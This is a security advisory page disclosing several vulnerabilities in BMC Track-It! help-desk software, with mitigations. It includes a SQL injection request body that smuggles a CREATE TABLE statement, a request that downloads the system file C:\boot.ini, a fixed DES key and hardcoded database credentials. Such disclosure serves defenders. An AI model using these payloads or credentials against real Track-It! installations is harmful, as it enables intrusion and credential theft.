what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

BMC Track-it! Remote Code Execution / SQL Injection

BMC Track-it! Remote Code Execution / SQL Injection
Posted Oct 8, 2014
Authored by Pedro Ribeiro

BMC Track-it! suffers from code execution, arbitrary file download, and remote SQL injection vulnerabilities.

tags | exploit, remote, arbitrary, vulnerability, code execution, sql injection
advisories | CVE-2014-4872, CVE-2014-4873, CVE-2014-4874
SHA-256 | 424ad45a542a874674f55fda959776d2554f26182771fb01a177badef46cb578

BMC Track-it! Remote Code Execution / SQL Injection

Change Mirror Download

tl;dr - I am releasing two 0 day exploits for BMC Track-It!. One is a
RCE and the other gets you the domain admin and SQL database creds.
Other minor vulns are also disclosed. Details below.

CERT handled the disclosure for these vulnerabilities (see CERT
VU#121036) and according to them BMC didn't even acknowledge the issue
for 45 days.

BMC have contacted me directly today, but it's too late now, the cat
is out of the bag as the CERT advisory has been published. Any
vulnerability researcher worth their salt will be able to work out how
to exploit these issues, so there is no point in holding back on
releasing the exploits.

The exploits have been submitted to Metasploit and should be released soon, see:

>> Multiple critical vulnerabilities in BMC Track-It!
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security

The application exposes several .NET remoting services on port 9010.
.NET remoting is a RMI technology similar to Java RMI or CORBA which
allows you to invoke methods remotely and retrieve their result. In
BMC Track-It!, the .NET remoting services are unauthenticated and
unencrypted, meaning that anyone can invoke all the exposed methods

It is possible to capture traffic and decode the packet format by
looking at the (incomplete) Microsoft .NET remoting specifications.
Using these techniques, two Metasploit modules were produced: one is a
exploit module that can upload arbitrary files to the web root and
achieve remote code execution, and the other is an auxiliary module
that allows retrieval of the SQL and domain administrator credentials.

Three other vulnerabilities (SQL injection, arbitrary file download
and hardcoded database credentials) were also discovered.

A special thanks to CERT for handling the communication to BMC and the
disclosure of these vulnerabilities. These issues are tracked by CERT
as VU#121036 (http://www.kb.cert.org/vuls/id/121036).

>> Background on the affected product:
"Track-It! IT Help Desk Software includes everything you need for IT
Help Desk management. Full featured, easy to deploy, easy to use and
cost-effective, Track-It! Help Desk is designed specifically with the
needs of small to mid-sized organizations in mind.
Over 55,000 organizations worldwide have trusted Track-It! for their
IT help desk ticketing and asset management needs. Track-It! IT Help
Desk Software includes, helpdesk, work order ticket tracking, incident
and problem management, knowledge management, service level
management, asset management, change management, software license
management, mobile device access, end-user self-service and more.
Track-It! Help Desk delivers the strength of ITSM best practices with
the simplicity of smooth installation and quick configuration to
provide instant return on your investment."

>> Technical details:
#1 Domain administrator and SQL server user credentials disclosure
Versions affected: 9 to 11.3+ (version 8 might be affected, but could
not be confirmed)

The application exposes an unauthenticated .NET remoting configuration
service (ConfigurationService) on port 9010.
This service contains a method that can be used to retrieve a
configuration file that contains the application database name,
username and password as well as the domain administrator username and
password. These are encrypted using a fixed key and IV ("NumaraIT")
using the DES algorithm. The domain administrator username and
password can only be obtained if the Self-Service component is
enabled, which is the most common scenario in enterprise deployments.
A Metasploit module that exploits this vulnerability has been released.

#2 Remote code execution via file upload (unauthenticated)
Versions affected: 8 to 11.3+
CVE-2014-4872 (same as #1)

The application exposes an unauthenticated .NET remoting file storage
service (FileStorageService) on port 9010.
This service contains a method that allows uploading a file to an
arbitrary path on the machine that is running Track-It!. This can be
used to upload a file to the web root and achieve code execution as
A Metasploit module that exploits this vulnerability has been released.

#3 Blind SQL injection (authenticated)
Versions affected: Unknown, at least 11.3

POST /TrackItWeb/Grid/GetData
= 51)) blag; $CREATE TABLE lol(lulz text);$ select woid from (select
woid, row_number() over (ORDER BY woid) RowNumber from z$vTASKS_BROWSE
-- ","comparison":"=","value":51}]

Accepts injection between the two $.

#4 Arbitrary file download (authenticated)
Versions affected: Unknown, at least 11.3

GET /TrackItWeb/Attachment/Open?attachmentType=1&entityId=1337&entityGuid=aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa&fileName=C:\boot.ini

#5 Hardcoded database credentials
Versions affected: Unknown, at least from 8 to 11.3+

When installed with the built-in SQL Express, Track-It! uses the
following hardcoded database credentials:
Username: TrackIt80_1
Password: TI_DB_P@ssw0rd

>> Fix:
UNFIXED - the vendor refused to acknowledge the vulnerabilities and
did not respond to CERT.
Block all communications from untrusted networks (e.g. the Internet)
to ports 9010 to 9020.
Block the database port if you are using the built in SQL Express
(port 49159 is the default in recent versions).
Ensure you do not have any untrusted users with access to Track-It!.

A copy of this advisory can be found in my repo:

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By